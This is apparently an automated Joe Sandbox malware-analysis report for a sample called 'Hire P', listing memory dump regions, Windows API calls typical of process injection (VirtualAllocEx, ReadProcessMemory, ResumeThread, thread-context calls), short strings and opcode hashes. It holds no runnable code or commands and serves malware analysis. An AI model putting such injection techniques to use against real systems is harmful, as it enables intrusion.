                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08808FD8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08808E16
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08808E16
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0282B37E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0880B90D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0880B90D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Hcq
                                                            • API String ID: 0-419967981
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LR_q
                                                            • API String ID: 0-2241839734
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8cq
                                                            • API String ID: 0-304758316
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8cq
                                                            • API String ID: 0-304758316
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: q
                                                            • API String ID: 0-4110462503
                                                            • Opcode ID: 00c82e9acd1dc314c47a6cc60ef2eebd3c47130a34a0bec052d650948670f34c
                                                            • Instruction ID: f271aea2ddfe3eaf76ac0e1b7f476076d273173be08f03dfa068ed46c18da82d
                                                            • Opcode Fuzzy Hash: 00c82e9acd1dc314c47a6cc60ef2eebd3c47130a34a0bec052d650948670f34c
                                                            • Instruction Fuzzy Hash: 16E0C234C04208DBCB14DFF4D4892BEBBB8970531AF00509AE84993340DB701A98CFD3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .
                                                            • API String ID: 0-248832578
                                                            • Opcode ID: da27a2340c325057061b68c0192a3e8a60989a74439c5dc4e4a323d0dc43cf0c
                                                            • Instruction ID: 09e46f783694ca4d2ac144b92be5900b3d0299edf1335c005d4f4ad6d83e98d1
                                                            • Opcode Fuzzy Hash: da27a2340c325057061b68c0192a3e8a60989a74439c5dc4e4a323d0dc43cf0c
                                                            • Instruction Fuzzy Hash: 5FE0C230E01208DBCB10EBB5D8483ADBBB89704322F1040AEE40957340D6B21AA0CE92
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db91c57fc00e51aa22ff288ef833e7b72a99a8accbd060a084a84ec7419a9949
                                                            • Instruction ID: d920d3f7f2656a43de3bbb868a17960ac0f6c62eafff08510fa5db2c62957d67
                                                            • Opcode Fuzzy Hash: db91c57fc00e51aa22ff288ef833e7b72a99a8accbd060a084a84ec7419a9949
                                                            • Instruction Fuzzy Hash: CB42E230D00659CFDF15EFA8C8446DCBBB1BF49300F51829AD5497B265EB30AAA9CF81
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 222ba8664cfefaf1a19d43da4abc925210c259f2af7a4f970b23082cf8f347bf
                                                            • Instruction ID: c7bb31de9ac571bb62b9856f846ef95ceecad6460b25d03a7549e6eaf4e4f0a0
                                                            • Opcode Fuzzy Hash: 222ba8664cfefaf1a19d43da4abc925210c259f2af7a4f970b23082cf8f347bf
                                                            • Instruction Fuzzy Hash: 3932E330D00659CFDF15EFA8C8446DCBBB1BF49300F51869AD5497B265EB30AAA9CF81
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b512f2abd794e59f9a8e9bf936739cf169a22b5ead0bea492b4aa4ab6ec33526
                                                            • Instruction ID: 0ff96a05e2cf2e646f8a6f7f4fb0fe59f9268f507b78f6d761f46ba2bddb0518
                                                            • Opcode Fuzzy Hash: b512f2abd794e59f9a8e9bf936739cf169a22b5ead0bea492b4aa4ab6ec33526
                                                            • Instruction Fuzzy Hash: 0EB1DC34E04219DFDB25DBA9C8446AEBBF2FF88311F20446EC505A7345DB7199A2CB92
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 125270aa93fef1ed521ecd96d01672c5e55d856420e9ac497ee8d10b65162a25
                                                            • Instruction ID: 4352f3599625a693806a0e403eceabbb56ad0bde4b09594e2b5170ae5f289037
                                                            • Opcode Fuzzy Hash: 125270aa93fef1ed521ecd96d01672c5e55d856420e9ac497ee8d10b65162a25
                                                            • Instruction Fuzzy Hash: 95F1CA75D1061ACBCF10DFA4C854AEEB7B5FF58300F11869AD949B7214EB70AA89CF90
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e64f41dad517252b3ad330ffe69acb0bd0729e048230119eb8bb7cb0ea4533b8
                                                            • Instruction ID: b52439d8bddcd48036a4e76c88438a476bbc09af845f54b027e03e79f078f425
                                                            • Opcode Fuzzy Hash: e64f41dad517252b3ad330ffe69acb0bd0729e048230119eb8bb7cb0ea4533b8
                                                            • Instruction Fuzzy Hash: 09E1CA75D1061ACBCF10DFA4C8545EDB7B5FF98300F1186AAD949B7214EB30AA89CF90
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c9ea80e2d73cabbfc246ddd490af98722fc22f21dd0232cdb054c40a1f65687
                                                            • Instruction ID: ac0a666f743439a2c3a95661b72d47fb64080aca93b0a116c96815ef936d2008
                                                            • Opcode Fuzzy Hash: 9c9ea80e2d73cabbfc246ddd490af98722fc22f21dd0232cdb054c40a1f65687
                                                            • Instruction Fuzzy Hash: A4819130E00619DFCB10EF68D9587ADBBB1FF44322F12856AD446A72A4EB30D965CF42
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 36e7840cd2916e84583eb2bee2e4f7c840a85980282150c91af9386fca6d2a92
                                                            • Instruction ID: 92f6f5e787b3ce71ac7e182ff0863e22fb8539ed2f6571e11c18d4c03e7f3e92
                                                            • Opcode Fuzzy Hash: 36e7840cd2916e84583eb2bee2e4f7c840a85980282150c91af9386fca6d2a92
                                                            • Instruction Fuzzy Hash: D351AD35E012449FDB10DFA9D850AADBBB2BF89321F1585AAE441FB3A0DB70EC51CB51
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ef656afc3ccc4d26ec749b79efa45640a440356518efadaf75390c39ddd12664
                                                            • Instruction ID: 7aad0151d9eb9e655db2d9b15b838b0b301a4a4bab0555de6edd2165b8ba1880
                                                            • Opcode Fuzzy Hash: ef656afc3ccc4d26ec749b79efa45640a440356518efadaf75390c39ddd12664
                                                            • Instruction Fuzzy Hash: B141BA70E14136BFCB19AF64C8546AA77F0EB44351F10442BE406E735CF6B4C9729B92
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c1799042dc616b342a7c4d27d7ab493b1a6889cb6dcbf75eeed5f4bb4b7fa1c
                                                            • Instruction ID: 0a9076f062b7c43927213ad912878f26aadfa931b4025c592d06d0561f2703c5
                                                            • Opcode Fuzzy Hash: 0c1799042dc616b342a7c4d27d7ab493b1a6889cb6dcbf75eeed5f4bb4b7fa1c
                                                            • Instruction Fuzzy Hash: 76415934E012089FDB04DFA9C854AADBBB2EF89321F15856AE401FB3A0DB70ED51CB51
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad8340decfdfff53637ee7f961119c3c5d600341e5669fa0033c924f37d47c9a
                                                            • Instruction ID: 704269176f5e97b606104c5dafd22543b4bb79b48ac694b1a4379253a92af56f
                                                            • Opcode Fuzzy Hash: ad8340decfdfff53637ee7f961119c3c5d600341e5669fa0033c924f37d47c9a
                                                            • Instruction Fuzzy Hash: 6D419870E00136BFCB1DAFA4C9586AA7BF1EB05361F10442BD446E725CF6B489329F92
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 133a34b96aa80c22e036d4426947a8f27deca577b30e336b6787ef31453d73d2
                                                            • Instruction ID: 91f18feba00dc7dc77bcc6ec801631e79e4a44df76d7939b670375b2853c8640
                                                            • Opcode Fuzzy Hash: 133a34b96aa80c22e036d4426947a8f27deca577b30e336b6787ef31453d73d2
                                                            • Instruction Fuzzy Hash: CE416C30A0021ADFCF049F65D845AAEBBB6FF84722F148429F8019B394DB34DD66CB91
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89684d830705946b3bb97a512e56a79fdc02f369fef06dee9e84123f8ebac33e
                                                            • Instruction ID: f98496bd618742ff295ab5a1c4deb085f4a2602e4244b7d9fd946746d33dc4e7
                                                            • Opcode Fuzzy Hash: 89684d830705946b3bb97a512e56a79fdc02f369fef06dee9e84123f8ebac33e
                                                            • Instruction Fuzzy Hash: 0D418D34E012089FDB04DFA9D854AADBBF2AF89321F15856AE401FB3A0DB70ED51CB51
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4f7a4e6248bff568e2679ccd6f2c6104b9278f14358a49c9a3e93760c748d8b
                                                            • Instruction ID: e7cdf34baac94b9a1af4b5d0e20cfbe93483afe2833b174c68d66f75ebcbd1ff
                                                            • Opcode Fuzzy Hash: b4f7a4e6248bff568e2679ccd6f2c6104b9278f14358a49c9a3e93760c748d8b
                                                            • Instruction Fuzzy Hash: 2D411274E2020A8FCB14CFB9D8995AEBBF5EF49351F00942AE856E7350EB308941CF91
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a68de904f0829c3d04d563eb7a3553f1fec890762721c185a65dea9e6a59a293
                                                            • Instruction ID: f452943805eb060f6ee48988a00f20cb2d56751d372d5b561425b0a913423aff
                                                            • Opcode Fuzzy Hash: a68de904f0829c3d04d563eb7a3553f1fec890762721c185a65dea9e6a59a293
                                                            • Instruction Fuzzy Hash: AB31F170E2020A9BCB14DFB9D8995AEBBF5EB48352F00942AE815E7350EB30D941CF91
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e830c4968fc17c46ee3a52cea7a2619b5ac1cb0295d91e85992f251d497ccbad
                                                            • Instruction ID: 4f8f01966434d38c6f1000511e11fdfe321b3e0380fd567ee6724294b416b71b
                                                            • Opcode Fuzzy Hash: e830c4968fc17c46ee3a52cea7a2619b5ac1cb0295d91e85992f251d497ccbad
                                                            • Instruction Fuzzy Hash: D6413434E09218DFDB159FA5D9584ADFFB2FF48311F21415AD841BB25ACB3189A1CF41
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7134dd04d6d61fd1dd7a6d3c2cabaa3cc2a1e0a3749b183f82a420656818a0a4
                                                            • Instruction ID: fc763ffd27ae427e9b6b4dfff5bcc84df061d5639f09f0d03d05a5b2f49e0d57
                                                            • Opcode Fuzzy Hash: 7134dd04d6d61fd1dd7a6d3c2cabaa3cc2a1e0a3749b183f82a420656818a0a4
                                                            • Instruction Fuzzy Hash: DE318A39A006088FDB05DF64C990AEE7BF6EF49305F1581AAE905EB362DA35ED05CF50
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f99b8b194c7eeaa7c0505b787d5c32b21bd1213ecbc92ccb7ba7c60ac0e21283
                                                            • Instruction ID: e8e164a160360c93f950c10963710439767ae583a1a7910a537be066710fb990
                                                            • Opcode Fuzzy Hash: f99b8b194c7eeaa7c0505b787d5c32b21bd1213ecbc92ccb7ba7c60ac0e21283
                                                            • Instruction Fuzzy Hash: 90313D75A0020A9FDB04DFA9D84499EBBF5FF88310B148269E945E7341EB34ED45CB61
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 90bd6368de74e1a5ce3fb77fb619d8b3600cad89db16c2ea45c2edb219fbedcf
                                                            • Instruction ID: 3c11f24f31704d370e4cc2212243140d0efbf1c75de3fe79121db79eb1a64e6c
                                                            • Opcode Fuzzy Hash: 90bd6368de74e1a5ce3fb77fb619d8b3600cad89db16c2ea45c2edb219fbedcf
                                                            • Instruction Fuzzy Hash: 57315B35A001088FCB14DFA8C994AEDB7F1EF49311F2441AAD505EB361DB329E61CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9197db1c970eae16ad28ba8be4411dee16086d7c690f8950390b9bd5915665c1
                                                            • Instruction ID: 4aa83f498226949c77e525448b0c3f34cb3b0f94b0a0614bd1197e86e06d6687
                                                            • Opcode Fuzzy Hash: 9197db1c970eae16ad28ba8be4411dee16086d7c690f8950390b9bd5915665c1
                                                            • Instruction Fuzzy Hash: 7731A330904318DFCB15EFA8D9146AEBBF1EF45301F00866ED4457B260EB74E999CB92
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d0a697e0324468575d5172c3131c0c219e7033212427c3ad9579883ac6ae475
                                                            • Instruction ID: 73c7a01512f2fdd941faf086533aa5b717f2edc6289b491cd52600a9651677bf
                                                            • Opcode Fuzzy Hash: 3d0a697e0324468575d5172c3131c0c219e7033212427c3ad9579883ac6ae475
                                                            • Instruction Fuzzy Hash: D2312974A0020A9FDB04DFA9D84499EBBF5FF8C310B148229E909E7341EB34ED45CB61
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 306d733f20d54f6436b9e036982942ba97d4411e23c230dd9ab96ca5596666e6
                                                            • Instruction ID: 242bce936628311d7ea6bd49ebe23fea05a26d9a2976ecca487a74c91f9821ec
                                                            • Opcode Fuzzy Hash: 306d733f20d54f6436b9e036982942ba97d4411e23c230dd9ab96ca5596666e6
                                                            • Instruction Fuzzy Hash: 3C21A430E00505D7CB157B65C4945EABB70EF41322F50896BC446A7254EB31E975CAD2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525183963.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_e9d000_Hire P.jbxd
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 595d0c4873b0574c83ef6f65a650f66244fb20ce9bb6cd2b82d18201b6e1bed1
                                                            • Instruction ID: 836dd31e1c272abee9cc3aac1c3b86df07c1f2abfa2fc63607a2dae644b30104
                                                            • Opcode Fuzzy Hash: 595d0c4873b0574c83ef6f65a650f66244fb20ce9bb6cd2b82d18201b6e1bed1
                                                            • Instruction Fuzzy Hash: A9315EB8E1020ADFCB40CFA9C5456AEFBF5AB08311F24946AD814E7300E7349A50CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 531cca8b2f84f57dfd74d612df68bc18130bdfda82aedb045c3939d101bda00c
                                                            • Instruction ID: c158890570f687b3a554be513ea56b1a3437c9a420a2dc7629a8d463ff7312b8
                                                            • Opcode Fuzzy Hash: 531cca8b2f84f57dfd74d612df68bc18130bdfda82aedb045c3939d101bda00c
                                                            • Instruction Fuzzy Hash: 96110B797057914BDB16563DDC4002EBF61EB86173B1A45EFD485CB362C9249C1AC3A3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525218193.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_ead000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4583fcabb4516238f06da3d6d89994626dd92adb257740ec22e1dd500e2abb22
                                                            • Instruction ID: d21a09e55885596c3124c54dadcf035dd4989112711e25c601c61975554b19f3
                                                            • Opcode Fuzzy Hash: 4583fcabb4516238f06da3d6d89994626dd92adb257740ec22e1dd500e2abb22
                                                            • Instruction Fuzzy Hash: 7921F575508204DFCB14DF14D9C4B16BF66EB89314F20C569E84A5F696C376E807CA61
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525218193.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_ead000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 71eb20e74226c4b785140c4a690b7cd3b1b77923cefc6ff6a58b6bc34de2f202
                                                            • Instruction ID: 18a50bc492fb51c5f50c2b1a839aadacdfb771bb29c4f33e1a79fbdcd2b68d99
                                                            • Opcode Fuzzy Hash: 71eb20e74226c4b785140c4a690b7cd3b1b77923cefc6ff6a58b6bc34de2f202
                                                            • Instruction Fuzzy Hash: 4A210775508204DFDB05DF54D9C0B26BB65FB89318F20C5ADE80A5F665C336E806CA71
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99819b12d00d4b1e285721782f53a554b3e54bd0c208b8e106b402b97845f9a9
                                                            • Instruction ID: bf9d7c3cdbcf5701274bbcd7585c2f15d86d5418e731a8ff6224930fa687f445
                                                            • Opcode Fuzzy Hash: 99819b12d00d4b1e285721782f53a554b3e54bd0c208b8e106b402b97845f9a9
                                                            • Instruction Fuzzy Hash: BC213075E002098FCF04EF69C8848AFB7B5FF88311B118669D905B7315EB70AA45CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 649bfa8a4f70b2807d362d43e72053b9cb603cad4a1f7f0cba86b8419c58530d
                                                            • Instruction ID: 97f9ed50d83faedadb29f0eebcccd1fca1b24d69e06014b38ffc25f5a0315715
                                                            • Opcode Fuzzy Hash: 649bfa8a4f70b2807d362d43e72053b9cb603cad4a1f7f0cba86b8419c58530d
